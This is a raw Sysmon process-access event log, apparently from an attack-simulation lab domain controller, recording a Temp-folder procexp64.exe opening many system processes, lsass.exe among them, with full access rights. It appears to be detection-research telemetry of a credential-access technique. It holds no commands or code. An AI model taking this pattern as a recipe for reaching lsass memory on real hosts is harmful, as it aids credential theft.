15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792948Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792947Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792946Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792945Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792944Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792943Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792942Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792941Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792940Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792939Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792938Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792937Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792936Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792935Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792934Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792933Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792932Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792931Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792930Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792929Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792928Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792927Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792926Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792925Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792924Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792923Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791